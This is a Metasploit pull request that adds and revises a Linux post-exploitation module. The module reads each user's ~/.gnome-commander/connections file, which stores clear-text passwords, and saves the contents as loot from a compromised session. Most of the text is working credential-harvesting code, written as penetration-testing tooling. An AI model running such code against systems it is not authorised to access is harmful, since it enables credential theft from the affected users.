### PR TITLE
Gnome commander creds

### DIFF
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
         begin
           print_good("File found : #{connections_file}")
           print_line(read_file(connections_file))
-          p = store_loot("connections", "text/plain", session, read_file(connections_file), "connections_file", "Gnome-Commander connections")
+          p = store_loot("connections", "text/plain", session, read_file(connections_file), connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -34,20 +34,21 @@ class Metasploit3 < Msf::Post
     # Try to find connections file in users homes
     user_dirs.each do |dir|
       connections_file = "#{dir}/.gnome-commander/connections"
-      unless file?(connections_file)
-        # File not found
-        print_error("File not found : #{connections_file}")
-      else
+      if file?(connections_file)
         begin
+          str_file=read_file(connections_file)
           print_good("File found : #{connections_file}")
-          print_line(read_file(connections_file))
-          p = store_loot("connections", "text/plain", session, read_file(connections_file), connections_file, "Gnome-Commander connections")
+          vprint_line(str_file)
+          p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
           print_error("Nothing read from file: #{connections_file}, file may be empty")
         end
+      else
+        # File not found
+        print_error("File not found : #{connections_file}")
       end
     end
   end

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -42,11 +42,11 @@ class Metasploit3 < Msf::Post
           print_good("File found : #{connections_file}")
           print_line(read_file(connections_file))
           p = store_loot("connections", "text/plain", session, read_file(connections_file), "#{connections_file}", "Gnome-Commander connections")
-          print_good ("Connections file saved to #{p.to_s}")
+          print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
-          print_error("Nothing read from file: #{dbvis_file}, file may be empty")
+          print_error("Nothing read from file: #{connections_file}, file may be empty")
         end
       end
     end

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
         end
       else
         # File not found
-        print_error("File not found : #{connections_file}")
+        vprint_error("File not found : #{connections_file}")
       end
     end
   end

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/auxiliary/report'
-
 class Metasploit3 < Msf::Post
 
   include Msf::Post::File

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
   def run
     user_dirs = []
     user = cmd_exec("whoami").chomp
-    if (user == /root/)
+    if (user == 'root')
        print_status("Current user is #{user}, probing all home dirs")
        user_dirs << '/root'
        cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
   def run
     user_dirs = []
     user = cmd_exec("whoami").chomp
-    if (user =~ /root/)
+    if (user == /root/)
        print_status("Current user is #{user}, probing all home dirs")
        user_dirs << '/root'
        cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
         begin
           print_good("File found : #{connections_file}")
           print_line(read_file(connections_file))
-          p = store_loot("connections", "text/plain", session, read_file(connections_file), "#{connections_file}", "Gnome-Commander connections")
+          p = store_loot("connections", "text/plain", session, read_file(connections_file), "connections_file", "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -1,0 +1,59 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Linux Gather Gnome-Commander Creds',
+        'Description'   => %q{
+          Gnome-commander stores clear text passwords in ~/.gnome-commander/connections file.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
+        'Platform'      => %w{ linux },
+        'SessionTypes'  => [ 'meterpreter', 'shell']
+      ))
+  end
+
+  def run
+    user_dirs = []
+    user = cmd_exec("whoami").chomp
+    if (user =~ /root/)
+       print_status("Current user is #{user}, probing all home dirs")
+       user_dirs << '/root'
+       cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
+    else
+       print_status("Current user is #{user}, probing /home/#{user}")
+       user_dirs << '/home/#{user}'
+    end
+    # Try to find connections file in users homes
+    user_dirs.each do |dir|
+      connections_file = "#{dir}/.gnome-commander/connections"
+      unless file?(connections_file)
+        # File not found
+        print_status("File not found : #{connections_file}")
+      else
+        begin
+          print_good("File found : #{connections_file}")
+          print_line(read_file(connections_file))
+          p = store_loot("connections", "text/plain", session, read_file(connections_file), "#{connections_file}", "Gnome-Commander connections")
+          print_good ("Connections file saved to #{p.to_s}")
+          print_line()
+        rescue EOFError
+          # If there's nothing in the file, we hit EOFError
+          print_error("Nothing read from file: #{dbvis_file}, file may be empty")
+        end
+      end
+    end
+  end
+end

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -22,23 +22,30 @@ class Metasploit3 < Msf::Post
 
   def run
     user_dirs = []
+    # Search current user
     user = cmd_exec("whoami").chomp
-    if (user == 'root')
+    # User is root
+    if user == 'root'
        print_status("Current user is #{user}, probing all home dirs")
        user_dirs << '/root'
+       # Search home dirs
        cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
     else
+       # Non root user
        print_status("Current user is #{user}, probing /home/#{user}")
        user_dirs << '/home/#{user}'
     end
     # Try to find connections file in users homes
     user_dirs.each do |dir|
+      # gnome-commander connections file
       connections_file = "#{dir}/.gnome-commander/connections"
       if file?(connections_file)
+        #File exists
         begin
           str_file=read_file(connections_file)
           print_good("File found : #{connections_file}")
           vprint_line(str_file)
+          #Store file
           p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
         rescue EOFError

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -9,8 +9,6 @@ require 'msf/core/auxiliary/report'
 class Metasploit3 < Msf::Post
 
   include Msf::Post::File
-  include Msf::Post::Unix
-  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super( update_info( info,

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -41,7 +41,6 @@ class Metasploit3 < Msf::Post
           vprint_line(str_file)
           p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
-          print_line()
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
           print_error("Nothing read from file: #{connections_file}, file may be empty")
@@ -52,4 +51,5 @@ class Metasploit3 < Msf::Post
       end
     end
   end
+  
 end

--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Post
       connections_file = "#{dir}/.gnome-commander/connections"
       unless file?(connections_file)
         # File not found
-        print_status("File not found : #{connections_file}")
+        print_error("File not found : #{connections_file}")
       else
         begin
           print_good("File found : #{connections_file}")


### PR DESCRIPTION
Gnome-commander stores clear text passwords in ~/.gnome-commander/connections file.
![gnome-commander](https://cloud.githubusercontent.com/assets/8155715/3677993/7a08c6f0-1296-11e4-80a9-052300eaae53.png)
